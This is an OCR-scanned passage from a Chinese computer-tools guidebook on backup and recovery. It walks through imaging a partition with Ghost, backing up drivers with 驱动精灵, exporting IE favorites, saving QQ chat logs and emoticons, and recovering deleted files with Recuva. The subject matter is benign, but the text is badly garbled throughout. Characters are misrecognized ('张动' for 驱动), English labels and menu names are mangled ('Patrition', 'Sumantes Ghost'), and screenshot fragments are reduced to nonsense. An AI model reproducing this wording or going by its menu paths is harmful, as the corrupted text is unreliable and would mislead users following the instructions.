windows | 内 存 诊 烛 


进入 开机 启动 菜单 后 在 键盘 上 按 “ 上 | 键 , 选择 “一 ”通过 键盘 方向 键 选择 “一 键 备份 系统 ”选项 ， 然 后 
键 GHOST”， 然 后 按 《Enter> 键 。 按 《Enter> 键 。 


STEP03: ”成功 运行 GHOST STEP04: 进入 GHOST 主 界 面 


hbouf Symantec Ghost 


Sumantes Ghost 11,0,2 Corporate Edition 

Symantec Corporation 

Copuyriaght tC 1998-2007 Syrmantec Corporation, HI riahts reserved, Syrnantec, the 
Surnantee Loao are tradernarks or reoistered tradernatks of Surnantee Corporation 
or its afftiliates in the US, and other countries, Dther narmes rnay be tradernarks of 

their respective ouumers， 


The lisensed Softuware and Docurmentation are deerned to be “cornrmercial scornputer 
sof+uuare” and “commrnercial compufer sof+uare NE 
5ecfions 12.212 and DFARS Section 227,.7202, 


Norton 
Sumantec.com 


弹出 启动 画面 ， 单 击 “OK” 按钮 即 可 继续 操作 。 


选择 “Local”> “Patrition”> “To Image” 命 令 。 
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STEP05: 选择 硬盘 STEP06: 选择 分 区 


[Select source partitionCs) from Basic drive: 1 


单 击 “OK” 按 钮 。 选择 操作 系统 所 在 的 分 区 ， 此 处 选择 分 区 1， 单 击 
“OK ”按钮 。 


STEP07: 保存 备份 文件 STEP08: 选择 备份 方式 


ompress Image 1916) 
Te Wolume Informafion 


Type:? [NTFS], 21885 HB, 2364 HB used, 
from Local drive [1], 40960 IB 
Local file 1.3:\xp.6HO 


选择 备份 文件 的 存放 路 径 并 输入 文件 名 称 ， 然 后 单 ”如 果 需 要 快速 备份 ， 则 单 击 “Fast” 按 钮 。 
击 “Save” 按 钮 。 


STEP09: 确定 是 否 备 份 STEP10: 系统 开始 备份 


Type:? [NTFS], 21885 HB, 2364 HB used, 
from Local drive [1], 40960 HB 
Local file 1.3:\xp.GHO 


Type:? [NTFS], 21885 HB, 2364 HB used, 
from Local drive [1], 40960 HB 
Local file 1.3:\p.GHO 


he 
单 击 “Yes” 按 钮 。 系统 开始 备份 后 耐心 等 待 即 可 ， 可 查看 备份 进度 。 


好 
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STEP11: 备份 完成 


ss 


JImage [Creafion Complefe (19257) 


查看 提示 信息 ， 单 击 “Continue” 按 钮 后 重新 启动 
计算 机 。 


Type:? [NTFS], 21885 HB, 2364 HB used, 
from Local drive C1], 40960 HB 


Local file 1.3:\nxp.6HO 


3. 使 用 GHOST 还 原 系 统 

使 用 GHOST 备份 操作 系统 以 后 ， 当 过 到 分 区 数据 被 破 坏 或 数据 丢失 等 情况 时 ， 束 可 
以 通过 GHOST 和 镜像 文件 快速 地 将 分 区 还 原 。 现 在 详细 介绍 使 用 GHOST 还 原 系 统 的 具 
体 方 法 和 步骤 。 


STEP01: 进入 GHOST 主 界 面 STEP02: 选择 镜像 文件 


Erom lmage 
Ty 


选择 “Local ”> "Patrition >“From lImage” 命 令 。 选择 要 还 原 的 GHOST 镜 像 文件 ， 然 后 单 击 “Open” 
按钮 。 
STEP03: ”确认 备份 文件 中 的 分 区 信息 STEP04: 选择 接 入 硬盘 


6 


Select local destination drive by clicking on the drive number 


单 击 “OK” 按 钮 。 由 于 计算 机 只 接 入 了 一 个 硬盘 ， 因 此 保存 默认 设置 
即 可 , 单 击 “OK” 按 钮 。 


297 


客 
合 人 人 他 


工具 全 攻略 
STEP05: 选择 要 还 原 的 分 区 STEP06: ”确认 选择 的 硬盘 以 及 分 区 


Type:? [NTFS], 21885 HB, 2364 HB used, No name 
from Local file 1.3:\xp.6HO, 40960 HB 

Type:? [HTFS], 21885 HB 

from Local drive [1], 40960 HB 


好 


单 击 “OK” 按 钮 。 单 击 “OK” 按 钮 。 
STEP07: ”GHOST 开始 还 原 磁盘 分 区 STEP08: ”还 原 成 功 


ne Complete C1912) 


| Reset mputer 


Type:? [NTFS], 21885 HB, 2364 HB used, No name 
from Local file 1.3:\xp.6HO, 40960 HB 

Type:? [NTFS], 21885 HB 

from Local drive [1], 40960 HB 


Type:? [NTFS], 21885 HB, 2364 HB used, No name 
from Local file ee 40960 HB 

Type:7 [NTFS], 21885 H 

from Local drive [1], TH HB 


开始 还 原 后 耐心 等 待 即 可 。 可 查看 还 原 进度 。 查看 提示 信息 ， 单 击 “Reset Computer” 按钮 重启 
计算 机 。 


16.2 分 与 还 原 工 具 


16:2.1 使 用 “驱动 精灵 ”备份 与 还 原 驱 动 程序 


驱动 精灵 是 一 区 集 张 动 管理 和 使 件 检 测 于 一 体 的 较为 专业 的 张 动 管理 和 维护 工具 。 张 
动 类 有 灵 为 用 户 提供 驳 动 备份 、 恢 复 、 安 逆 、 删 除 、 在 线 更 新 等 实用 功能 ， 一 旦 出 现 异 帝 情 
况 ， 驱 动 精灵 束 能 在 最 短 时 间 内 让 便 件 恢复 正常 运行 。 

在 计算 机 重 闭 前 ， 将 你 目前 计算 机 中 的 最 靳 版 本 张 动 程 序 备份 下 来 ， 竺 重 厂 完成 后 ， 
再 使 用 驱动 程序 的 还 原 功能 安装 ， 这 样 便 可 以 市 省 许多 驱动 程序 安装 的 时 间 ， 并 且 再 也 不 
怕 找 不 到 驱动 程序 了 。 

1. 使 用 驱动 精灵 备份 驱动 程序 

现在 详细 介绍 一 下 使 用 驱动 精灵 备份 驱动 程序 的 具体 使 用 方法 和 步 又 。 
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| 村 三 模式 | | 玩家 模式 | | 驱动 调 || 备份 还 厌 | 
LN 已 经 备份 4 个 投 备 ，2 个 设备 可 备份 


版 本 :6.1.7601.17514 
版 本 : 6.1.7601.17514 
版 本 : 6.0.1.6428 


备份 取消 


版 本 :6.1.7601.18251 


主 程序 版 本 : 7.1.103.15.18 


单 击 “驱动 程 
序 ” 图 标 。 


省 已 连 傣 到 & 动 精灵 服务 器 


切换 到 “备份 还 原 " 
选项 卡 , 单 击 “路径 设 
置 " 按钮 。 

选择 要 备份 的 驱动 程序 


STERPOS: 


驱动 精灵 2013 


信人 了 FIRE 


| 标 从 模式 | | 玩家 模式 | 
LN 已 经 备份 4 个 设备 ，2 个 设备 可 备份 
起 
[Y] Intel(R) 82802 Firmware Hub Device 等 7 个 设备 版 本 : 6.1.7601.17514 已 备份 还 原 
[v| High Definition Audio 控制 器 版 本 :6.1.7601.17514 已 备份 还 原 时 
哺 )) 去 下 


(v| Reaktek High Definition Audio 版 本 : 6.0.1.6428 备份 取消 | 备份 
疯 "seas 
Y] Intel(R) 82801G (ICH7 Family) USB Universal Host Contr.， 等 5 个 设备 。 版 本 : 6.1.7601.18251 已 备份 还 原 


Y] Intel(R) 82801GB/GR/GH (ICH7 Family) Serial ATA Storage Controll... 


版 本 : 6.1.7601.18231 已 备份 还 原 


可 对 单个 驱动 程序 进行 备份 , 也 可 单 击 “ 一 键 备 


份 ”按钮 一 次 性 备份 。 
STEP05: 备份 完成 


文件 (编辑 (E) ”查看 V) 工具 (D 帮助 (H) 
组 织 ”包含 到 库 中 > ”新 建文 件 夫 


畜 由 项 夫 “和 
LL drivers.mf 
[| HID-compliant mouse.zip 
固 High Definition Audio 控制 器 .zip 


国 @ 
修改 日 其 


2014/1/8 17:50 


出 Intel(R) 82801G (ICH7 Family) USB Un... 
固 Intel(R) 82801GB GR GH (ICH7 Family... 
| Intel(R) 82802 Firmware Hub Device,z.， 
出 | Reakek High Definition Audiozip 


图 迅 理 下 载 
砷 育 乐 


2. 使 用 驱动 精灵 还 原 驱动 程序 


呈 第 16 讲 


系统 和 数据 的 备份 与 恢复 
STEP02: 设置 驱动 备份 路 径 


选择 目录 。 打开 目录 


D:\MyDrivers\update\ 
驱动 备份 路 径 (恢复 默认 路 径 】 


D:\MyDrivers\backup\ 


选择 目录 ”打开 目录 


名 备份 葡 动 到 文件 夫 (D) 
加 备份 驱动 到 ZIP 压 综 文 件 四 


设置 驱动 备份 路 径 , 可 选择 备份 到 文件 夹 还 是 ZIP 压 
缩 文件 ， 选 是 后 单 击 “确定 ”按钮 。 


STEP04: 选择 是 否 履 盖 原 来 的 备份 


@ 设备 Intel(R) 82802 Firmware Hub Device 的 驱动 已 经 
备份 过 ,是 百 覆 盖 ，。 


单 击 “ 是 ”按钮 会 覆盖 原来 的 备份 文件 , 重新 进行 
备份 。 


在 设 定 的 备份 路 径 中 碍 看 已 经 备份 的 压缩 文件 。 


备份 了 张 动 程序 后 ， 在 张 动 程序 丢失 、 损 坏 时 惑 可 以 通过 张 动 精灵 来 还 原 所 有 驱动 程 
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序 ， 从 而 重新 正常 使 用 。 
接 下 来 就 详细 介绍 使 用 张 动 精灵 还 原 驱 动 程序 的 具体 操作 方法 和 步骤 。 
STEP01: 打开 “驱动 程序 ”界面 STEP02: ”了 驱动 程序 完成 更 新 
Sx 


GE Es 


[ww 已 经 成 功 备份 所 有 设备 驱动 , 共 6 高 


版 本 : 6.1.7601.17514 


[| Intel(R) 82802 Firmware Hub Device 竺 7 个 设备 


[] High Definition Audio 控 剂 器 版 本 : 6.1.7601.17514 
呈 )) zt 
[| Realtek High Definition Audio 


师 USB 设 备 


[DD Intel(R) 82801G (ICH7 Family) USB Up 


@ 驱动 程序 已 经 更 新 完成 , 需要 重新 启动 计算 机 才能 生效 
”现在 就 重新 启动 吗 ? 


版 本 : 6.0.1.6428 


版 本 : 6.1.7601.18251 


本 存储 设备 
,| Intel(R) 82801GB/GR/GH (ICH7 Family) Serial ATA Storage Controll,，。” 版 本 ;6.1.7601.18231 ”已 备份 
eu 


门 HID-compliant mouse 


版 本 : 6.1.7600.16385 


路 径 设置 ”| ”一 铺 各 
训 已 庄 接 有 BE 动 梢 只 服务 吕 


切换 至 “备份 还 勾 选 需要 还 原 的 驱动 程 ” 单 击 “ 重 启 系统 ”按钮 ， 计 算 机 将 重新 启动 并 使 还 
原 " 选项 卡 。 序 , 然后 单 击 “ 还 原 " 按 钮 。 原 的 驱动 程序 生效 。 


回 ] 全 这 
主 程序 版 本 ; 7.1.108.1610 


16;2.2 备份 与 还 原 正 浏览 器 的 收藏 夹 


IE 浏览 器 的 收藏 夹 是 用 户 名 用 的 一 项 功能 ， 用 户 将 自己 喜欢 或 者 第 用 的 网 站 加 入 收藏 
夹 中 ， 在 使 用 时 不 用 再 次 手动 输入 网 址 进行 搜索 ， 和 直接 在 收藏 夹 中 单 击 相 应 网 址 选项 即 可 
打开 该 网 站 。 但 是 因为 了 正 浏览 器 是 Windows 操作 系统 中 自 带 的 一 款 浏览 器 ， 重 装 操作 系 
统 后 ，IE 浏览 器 也 会 重 装 ， 从 而 之 前 收藏 的 网 址 都 会 被 清除 ， 所 以 要 避免 被 清除 ， 就 要 对 
IE 浏览 器 的 收藏 夹 进行 备 份 ， 以 便 在 需要 时 将 其 还 原 到 系统 中 。 

1. 备份 IE 浏览 器 的 收藏 夹 

接 下 来 就 详细 介绍 备份 下 浏览 器 的 收藏 夹 的 具体 操作 方法 和 步 又 。 

STEP01: 打开 IE 浏览 器 STEP02: 导出 浏览 器 设置 


你 希望 如 何 导入 或 导出 你 的 浏览 器 设置 ? 


从 另 一 个 浏览 器 中 导入 0 
添加 到 收藏 去 [A).. Ctrl+D 下 
ee ) 回 导出 到 文件 吕 ) 
就 加 唱 收 医 夫 栏 (B) 


将 当前 所 有 的 网 页 阐 加 到 收藏 去 人).… 


单 击 “ 查 看 收藏 严 、 源 和 历史 记录 " 图标， 然后 选择 ” 国 选中 “导出 到 文件 ， 单 击 下 一 步 
“添加 到 收藏 夹 ”> “导入 和 导出 ”命令 。 单 选 按钮 。 按钮 。 
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STEP03: ”选择 导出 内 容 STEP04: 选择 要 导出 收藏 夹 的 文件 来 


你 希望 导出 哪些 内 容 ? 选择 你 希望 从 哪个 文件 去 导出 收藏 夫 


| 由 小 荡 坟 
团 收 藏 夹 (h) 是 几 Windows Live 服务 
回 源 多 ) 来 栏 
cookie C) 


= | | 国王 工 JE | | 
义 选 要 导出 的 内 容 单 击 “下 一 步 ” 国 选中 要 导出 收藏 国 单 击 ' 下 一 步 
复 选 框 。 按钮 。 的 文件 夹 。 按钮 。 
STEP05: ”选择 收藏 夹 导 出 路 径 STEP06: ”成 功 导 出 收藏 夹 


你 希望 将 收藏 赤 导 出 至 何 处 ? 你 已 成 功 导出 了 这 些 设置 


注 7 ee 多 - 
di "Documents"bookmark. htm 


单 击 “浏览 ”按钮 ， 单 击 “导出 ” 单 击 “完成 ”按钮 。 
选择 文件 路 径 。 按钮 。 


2. 还 原 下 浏览 器 的 收藏 夹 
成 功 对 收藏 夹 进行 备份 后 ,在 重 装 系 统 后 ,用户 只 须 还 原 契 浏览 器 的 收藏 夹 便 可 瞬间 
找 回 和 常用 的 收藏 夹 。 接 下 来 就 详细 介绍 还 原 正 浏览 器 的 收藏 夹 的 具体 操作 方法 和 步骤 。 


STEP01: 打开 IE 浏览 器 STEP02: 选择 导入 方式 


束 加 刘 收 藏 去 呈 )… 
剖 加 到 收藏 夫 栏 (B) 
将 当前 所 有 的 网 页 漆 加 到 收藏 夫 (M).. 


并 趾 


单 击 “查看 收藏 来 、 源 和 历史 记录 ”图 标 ， 然 后 选 选中 “从 文件 导 单 击 “ 下 一 步 ? 
择 “ 添 加 到 收藏 夹 ”>“ 导 入 和 导出 ”命令 。 入 ” 单 选 按钮 。 按钮 。 
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Py > 
2 工具 全 攻略 


合 人 他 他 


STEP03: 选择 要 导入 的 内 容 


你 希望 导入 哪些 内 容 ? 


加 收藏 夹 () 
回 源 多 ) 
加 Cookie (C) 


< 区 0 


勾 选 要 导入 的 内 容 。 辆 单 击 “ 下 一 步 " 按钮 。 
STEP05: ”选择 书签 文件 


司 ” 团 


排列 方式 : 文件 夫 


4 公用 文档 (5) 
CA 用 户 \ 公 用 


4 hl 
文件 名 (N): bookmark.htm 


选中 之 前 备份 的 htm 四 二 二 大 
文件 。 按钮 。 
STEP07: 选择 要 导入 的 文件 夹 


选择 导入 收藏 来 的 目标 文件 夹 


加 | 收 苇 夫 
| 中 Windows Live 服务 


《 上 一 步 @B) 


选中 要 导入 的 单 击 “ 导 入 ” 
文件 夹 。 按钮 。 


© 


提示 


地 被 所 有 浏览 器 导入 和 还 原 ， 
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STEP04: ”选择 导入 收藏 夹 的 路 径 


你 希望 从 何 处 导入 收藏 来? 


键入 文件 路 径 或 浏览 到 文件 : 


《上 =- 步 @)j 下 一 步 中 让 [取消 


单 击 “ 浏 览 ”按钮 ， 选择 文 件 路 径 。 
STEP06: 完成 文件 路 径 选 树 


您 希望 从 何 处 导入 收藏 夫 ? 


键入 文件 路 径 或 浏览 到 文件 : 


d DeeumeartsAboolm ark. htm 


EF 


查看 已 选择 的 单 击 “下 一 
文件 路 径 。 步 ”按钮 。 
STEP08: 成功 导入 收藏 夹 


你 已 成 功 导入 了 这 些 设置 


单 击 “ 完 成 ”按钮 即 成 功 还 原 IE 浏 览 器 的 收藏 夹 。 


由 于 使 用 下 浏览 器 导出 的 文件 格式 为 .htm 格式 ,因此 该 备份 文件 可 以 轻松 
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16:2.3 备份 和 还 原 QQ 聊天 记录 


在 使 用 QQ 聊天 软件 进行 聊天 时 ， 会 产生 大 量 的 聊天 记录 。 虽 然 QQ 软件 自 带 了 在 线 
备份 和 随时 碍 阅 全 部 消息 记录 的 功能 ， 但 这 需要 用 户 开 通 QQ 会 员 才 能 实现 。 其 实用 户 在 
不 开通 QQ 会 员 的 情况 下 依然 可 以 对 聊天 记录 进行 备份 和 还 原 。 

1. 备份 QQ 聊天 记录 

接 下 来 就 详细 介绍 备份 QQ 聊天 记录 的 有 具体 操作 方法 和 步骤 。 


STEP01: 登录 QQ STEP02: ”打开 “消息 管理 器 ” 


”老乡 [7/19 
网 友 [5/1 
同事 [4/9] 

”工作 伙伴 [7/12] 


企业 好 友 [0 问 
阳 生 人 Do/ 疡 5] 


在 QQ 主 界面 下 方 单 击 “ 消 息 ” 图 标 。 选择 “工具 ”>“ 导 出 全 部 消息 记录 ”命令 。 
STEP03: 选择 保存 文件 位 置 STEP04: 导出 消息 记录 


Es = 修改 日 期 
二 


2013/11/20 9:29 正在 导出 消息 记录 ,.， 
2012/6/21 9:01 
/ 用 FFOutpu 2012/10/13 9:32 
点 面 2012/11/13854 | 
2014/1/8 10:41 = 
2013/10/22 11:47 

村 = 全 三 本] 公主 
wo 查看 消息 记录 导出 进度 ， 进 度 条 结束 时 将 会 完 
2013/3/11 13:56 
2014/1/7 15:33 导出 。 
2014/1/1 12:39 
2014/1/7 9:11 


量 折 访问 的 位 置 一 


输入 保存 名 称 ， 然 后 单 击 “保存 ”按钮 。 
2 还原 QQ 聊天 记录 


QQ 聊天 记录 可 以 从 QQ 聊天 软件 中 备份 出 来 , 同样 可 以 还 原 到 QQ 聊天 软件 中 , 接 下 
来 就 介绍 还 原 QQ 聊天 记录 的 具体 操作 方法 和 步骤 。 
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客 志 
-工具 人 攻 了 


合 人 他 他 
STEP01: 登录 QQ STEP02: ”打开 “消息 管理 器 ” 


老 多 [7/19] 
网 友 [5/14] 
同事 [4/8] 
工作 伙伴 [71 


导入 消 明 记录 
企业 好 友 [00] :二 


阳 生 人 [0/75] 


选择 "工具 ”>“ 导 入 消息 记录 ”命令 。 
STEP03: 选择 导入 内 容 STEP04: 选择 导入 方式 


A OD) TT 


勾 选 要 导入 的 内 容 单 击 “ 下 一 步 "按钮 。 图 选中 一 个 文件 单 击 “浏览 " 按钮 。 
导入 方式 


STEP05: 选择 QQ 消息 记录 备份 文件 STEP06:” 完成 备份 文件 选择 


查找 范围 fC): 。 国 文档 


| | 


上 
| 可 导 人 和 的 文件 关 型 为 :*,db,*,bak 
| |D:\Documents\ 全 部 消息 记录 .bak 


让 定义 Office 模 全 部 消 乱 记录 .bak; 
板 


公用 文档 (5) 


文件 名 0 : 全 部 消息 记录 .bak 
文件 类 型 01): 


选中 QQ 消息 记录 备份 文件 后 单 击 “ 打 开 按钮 。 单 击 “ 导 入 ”按钮 。 
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STEP08: 消息 9 


STEPO7: 


A 


正在 导入 消 乱 记录 .… 


一 


查看 消息 记录 导入 进度 。 单 击 “ 完 成 ”按钮 。 


10.2.4 备份 和 还 原 QQ 目 定 义 表 情 


在 与 好 友 聊 天 时 QQ 表情 是 非常 频 索 使 用 的 ， 有 时 候 表 情 能 够 比 文字 更 有 表达 力 ， 
更 容易 体现 出 聊天 者 的 心情 、 看 法 等 。QQ 在 安 钱 时 往往 会 目 市 一 些 表 情 ， 但 是 这 些 表 
情 比 较 单 一， 有 时 难以 满足 用 户 的 需求 ， 这 时 用 户 就 可 以 手动 添加 一 些 自 己 喜 欢 的 表情 
到 个 人 QQ 账号 中 。 为 了 保证 目 己 请 加 的 表情 不 致 丢失 ， 可 将 其 备份 ， 在 必要 时 再 进行 
还 原 。 

1. 备份 QQ 目 定 义 表情 

在 腾讯 QQ 中 ， 目 定义 表情 一 般 都 保存 在 X:Documents\Tencent Files\******\Jmage 六 
件 夹 中 , 其 中 X 代表 安装 QQ 的 磁盘 ,*##x##s## 表 示 QQ 号 。 备 份 QQ 上 自 定 义 表 情 就 是 将 Image 
文件 夹 复制 并 粘贴 到 除 系 统 分 区 外 的 其 他 分 区 中 , 并 且 要 为 备份 的 QQ 目 定 义 表情 重 命 名 ， 
名 字 要 好 理解 ， 以 免 需要 使 用 时 难以 辨别 。 


hk Tencent Files } ss » Image ， 
文件 (F) ”编辑 (E) ”查看 (V) 工具 (T) 帮助 (H) 


i 库 文档 


文档 库 


Image 


排列 方式 : 


CD 


1 
$)SL73I62{UEJ~ 
G17H2{A.gif 


文件 去 > 
台 | 最 近 访 问 的 位 置 


$36IWOR83B3)Y] 
@@Z4ZV6BZ ANV.gif 


司库 
加 | PPTY 视 频 $$3VS5AR~($~E $$TIL1487XOB[ $96°~3D%$JB}G 
@ WO p78VC.g 


瞳 视频 YIKJUMIVZOU.gi D@$000}$2B6. 
图 | 图 片 if gif 

国 X 悄 

司 迅雷 下 载 
ej 言 秘 


$T 02]T~YR]HE 
V481R~3H7.gif 


网 京 庭 组 


10.455 个 对 每 


岗 J 
$ 8Y@CRILUS'L 
GMVKU5]$Gkj 


$1BY[IK2R3V{ER 
880UZW$K(V.gi 


$1URUAYE7028 
V6G}HO(~WBK, 


加 


$2}96ZWTUN~I 
S~$LYJCFN15.g 


QQ 目 定 义 表情 存放 位 置 


好 
EY 


$3JFV${9]0NDSS 
({N3Z4$G,Jpg 


@ 
$4°CVII941AND 
XNXHRGVW93j 


cm 
PE 工具 人 攻 了 
全 人 人 他 


2. 还原 QQ 目 定 义 表 情 

还 原 QQ 目 定 义 表情 是 指 将 备份 的 QQ 自 定义 表情 添加 到 QQ 表情 中 ， 在 还 原 时 ， 用 
户 可 创建 新 的 分 组 将 要 还 原 的 QQ 目 定 义 表 情 单独 放 在 一 个 组 中 。 接 下 来 介绍 还 原 QQ 目 
定义 表情 的 具体 操作 方法 和 步骤 。 


STEP01: 登录 QQ STEP02: 查看 QQ 表情 
eeseosoooeoeeosol 
BOGSBEoODE 岛 车 

辐 全 可 昌 太 六 回国 而 日 源 思 可 国 

i 由 生 国 时 四 有 网 的 时 国电 四 因 因 全 
A A hE , 
”时 
+%qdysdsdlsess 
| 
全 | 人 鲁 浮 

双击 一 个 QQ 好 友 图 标 。 单 击 “表情 ”图 标 ， 在 打开 的 表情 框 中 单 击 右 下 角 
的 “设置 ”图 标 ， 然 后 选择 “添加 表情 ”命令 。 


STEP03: 选择 备份 的 自 定义 表情 STEP04: 选择 要 添加 的 表情 分 组 


| 
| 
LA | 


$96 ~3D96$JB}G.… | $96IWOR83B3)... SL73162{DEJ~.… S$_TA 


= 
4 | 
2 | 
E 3 
| 


$8Y@CR}LUSTL... | $1BYI[K2R3V{E... 


| FNI1S mif : 


文件 名 0 : “$2}NZHTUN IS“$LYT CFHIS. gif” “$% “3D% v | (0) 
; 水. 1 沙 . pn 


文件 类 型 (T): 
按 <Ctrl+A》 快 捷 键 可 一 次 性 全 选 ， 然 后 单 击 “ 打 择 将 这 些 自 定义 表情 加 入 已 有 的 分 组 中 或 者 新 
开 ， 按钮 ， Eee， ‘新 建 分 组 ”链接 。 
STEP05: ”新 建 分 组 STEP06: ”查看 自 定义 表情 


高 3 ”座次 5 雇 c 性 次 7 4 十 原色 表情 | 
输入 分 组 名 并 单 击 “确定 ”按钮 。 在 表情 框 中 可 查看 到 添加 的 自 定 义 表情 。 
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对 于 一 些 经 常 需 Ms 可 到 网 上 下 载 最 新 的 一 些 表 情 包 ， 然 后 载 入 


QQ 表情 框 中 。 接 下 来 介绍 导入 和 导出 表情 包 的 具体 操作 方法 和 步骤 
STEP01: 进入 QQ 表情 包 网 站 STEP02: ”打开 QQ 表情 框 


导入 导出 表情 包 “| 


漫游 表情 包 
反馈 意见 
吉祥 物 。3366 周 年 庆 推出 包子 系列 表情 。 
作者 : QQ[99255935] 发 布 日 期 : 2011.6.29 
i 0 何 使 用 QO 才情 
下 载 自己 喜欢 的 表情 包 。 选择 “导入 导出 表情 包 ”> “导入 表情 包 ” 命 令 。 


STEP03: 选择 已 下 载 的 表情 包 STEPO4: | 


查找 范围 [5): ” 国 文档 


到 
卓 面 
寺 入 机 单 击 “确定 ”按钮 。 
-Cj 
选中 下 载 的 表情 包 ， 单 击 “ 打 开 ” 按 钮 。 
STEP05: 查看 导入 的 表情 包 STEP06: 导出 表情 


次 语 次 图 癌 闪 4+ 原 二 | 外 | 4 十 原 忆 表情 | 如 
导入 的 包子 表情 。 单 击 表 情 框 右 下 角 的 “设置 ”图 标 , 选择 “导入 导 
出 表情 包 ” > “导出 本 组 表情 包 ” 命令。 
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STEP07: 选择 要 导出 的 表情 包 的 保存 位 置 STEP08: 成功 导出 表情 


保存 在 避 : 国文 档 


了 = 
:作坊 


最 近 访 问 的 位 置 


公用 文档 (5) 


器 羽 包 


文件 名 加 ): 戎 小 gq. eif 
保存 类 型 5): 。 | 表 情 导出 文件 (reif) ~ 


选 定 保 存 位 置 后 单 击 “保存 ”按钮 。 


STEP09: ”查看 导出 的 表情 包 


‘cI EDLTEET 加 1 
文件 (F] ”编辑 (E) ”查看 (V) 工具 (T) 帮助 (H) 
组 织 v 全 打开 ~” 电子 邮件 新 建文 件 夫 
收藏 夫 文档 库 
局 下 载 包括 ; 3 个 位 置 
国 点 面 
辐 最 近 访 问 的 位 置 Q CA” 
< (sz 
恒 库 
让 PPTV 视 频 12090.eif bookmark.htm 
图 视频 ps = 
加 图 片 | 
和 WwE WE 六 
9 Te 在 所 选择 的 存储 位 置 即 可 看 到 导出 的 表情 包 。 
直言 和 trhsh trhsh.d 
(Fixed).bak.doc 
网 宗 庭 组 = en 
2 pg est Wm ss Ss 
Qa 荫 小 q.eif 修改 日 期 : 2014/1/8 15:50 创建 日 期 : 2014/1/8 15:50 
9 及 EMOTION ,File 大 小 : 967 KB 


16.3 重用 恢复 工具 恢复 误 删 除 的 数据 


16;3.1 使 用 Reclya 恢复 数据 


Recuva 是 一 个 由 Piriform 工作 室 开 发 的 可 以 恢复 被 误 删 除 的 任意 格式 文件 的 恢复 工 
具 。Recuva 能 直接 恢复 硬盘 、 闪 盘 和 存储 卡 (如 SD 卡 、MMC 卡 等 ) 中 的 文件 ， 只 要 没 
有 被 重复 写 入 数据 ， 无 论 格 式 化 还 是 删除 均 可 直接 恢复 。 

1. 通过 向 导 恢 复数 据 

Recuva 问 导 可 直接 选 定 要 恢复 的 文件 类 型 ， 从 而 进行 有 针对 性 的 文件 恢复 。 此 处 我 
们 以 恢复 音乐 文件 为 例 详细 介绍 通过 Recuva 向 导 恢 复数 据 的 具体 操作 方法 和 步骤 。 
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STEP01: ”启动 Recuva 数据 恢复 软件 


欢迎 来 到 Recuva 向 导 


这 个 向 导 助 您 恢复 您 喇 除 的 文件 , 只 需 回答 漳 单 几 
个 问题 ， Recuva 会 帮 您 做 余下 的 事情 . 


如 果 您 不 想 使 用 向 导 , 简单 的 单 击 一 下 取消 您 将 可 以 访 
问 Recuva 的 高 级 功能 ， 


站 启动 时 不 显示 此 向 号 (D) 


“返回 占 ) | 证 


单 击 “下 一 步 ”按钮 。 


STEPO3: 


Recuva 向 层 


文件 位 次 
文件 在 哪里 ? 


选择 文件 位 置 


@ 无 法 确定 
Cr 


”查找 所 有 可 移 Fy (除了 cD 和 软盘 ) 上 已 胜 除 的 文件 ， 
曲 在 我 的 文档 (b) 
查找 用 户 文档 广 件 来， 


避 在 回收 站 (B) 

查找 在 回收 六 出 除 的 文件 ， 
品 在 特定 位 置 (5) 

Ge 

Ona CD / DVP 


无 法 确定 存放 位 置 时 选 
中 “无 法 确定 ” 单 选 按钮 。 


STEP05: 扫描 已 删 F 


EE 


按钮 。 
余 的 文件 


扫描 1 共 5 个 驱动 器 中 
步 骆 1 共 3: 扫描 驱动 右 的 已 暗 除 交 件 中 
当前 进度 : 44, 已 找到 57372 个 文件 


县 测 本 


预计 刹 余 时 间 : 3 分 


显示 扫描 进度 条 。 


单 击 “ 下 一 步 


STEP02: 选择 文件 类 型 


兴 型 
您 在 恢复 什么 类 型 的 文件 ? 


局 所 有 文件 (A) 
显示 所 有 文件 ， 


品 图 片 (P) 
例如 数码 照片 . 
和 全 便 如 MP3 播放 器 的 音乐 记 件 . 
加 文档 (D) 
只 显示 公共 办 分 文档 格式 , 例如 Word 和 Excel 文件 . 
各 视频 (Vv) 
只 显示 视频 文件 , 从 由 0 数 码 摄像 机 拍摄 的 片段 ， 
全 压 第 (OQ) 
只 显示 压缩 交 件 ， 
癸 电 子 邮 件 (E) 


Show i emails from Thunderbird, Outlook Express, Windows Mail and Microsoft 
OQutlook. 


ES | 


选中 “音乐 ” 单 击 “ 下 一 步 ” 
单 选 按 钮 。 按钮 。 
STEP04:” 准备 查找 文件 


到 一 个 Recuva 查找 到 的 文件 列表 ， 
恢 县 的 交 件 并 点 击 恢复 按 扭 ， 


如 果 前 灾 查 找 文 件 失 败 , 请 色 选 这 一 选 框 , 注意 此 操作 在 
太 驱 动 强 上 需要 超过 一 个 小 时 , 


站 启用 深度 搜索 (D) 
点 击 开始 执行 查找 . 


< 


单 击 “ 开 始 ” 按 钮 。 


STEP06: 扫描 到 的 音乐 文件 


cE piriform Recuva 


烧 人 时 要 收复 的 文件 然后 点 击 恢 复 按 筷 ， 


住 结果 , 请 恢 屋 文件 到 不 同 的 驱动 器 . 
路 径 最 后 修改 BH “ 
CN\Users\Administrator\Desktop\ 新 建文 件 实 (3)\,.， 2011/10/ 司 
CN\Users\Administraton\Desktop\ 新 建文 件 志 (3)\... 2011/8/7 


证 风 吾 所 类 南庄 a 

| 回转 襄 剑 高 潭 落叶 沉香 变奏 ,mp3 | CNUsersWAdministratomDesktop\ 新 建文 件 夫 (3)\.。 2011/9/1 

| © 户 风 空 录 淡 亮 天 元 主题 言 乐 .m.| CNUsersWAdministratomDesktop\ 新 建文 件 夫 (3)\..。 2011/8/1 
避 全 D CN\Users\Administrator\Desktop\ 新 建文 件 立 (3)\.。 2011/8/7 

CiN\Users\Administrator\Desktop\ 新 建文 件 赤 (3)\,.。 2011/8/9 


CN\Users\Administrator\Desktop\ 新 建文 
A LY I ON RN PR rm 


a | 
Fs, 73.2 G6. 放大 小 : 4096, 文件 记录 太 小 : 1024. 在 150.09 种 办 找到 1,02..， 


单 击 “ 恢 复 " 
按钮 。 
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STEP07:” 选择 文件 存储 位 置 


浏 览 文 件 支 
娃 择 恢 晨 出 文件 的 存放 位 置 
册 MessenPass 


P 旧 Microsof Web Application Stress T: 


» ® Misc 


1 music 


> MyDrivers 


选 定 存储 位 置 后 单 击 “确定 ”按钮 。 


STEP09: 查看 已 恢复 的 音乐 文件 


文件 ( ”编辑 (E) ”查看 (V) 工具 (T) ”帮助 (H) 
组 织 了 包含 到 库 中 Y 全 部 摇 放 ”新建 文件 夫 


~ 名称 


引 | 国 古风 音乐 千年 风雅 
国 证 风 音 乐 燃 雨 庄 


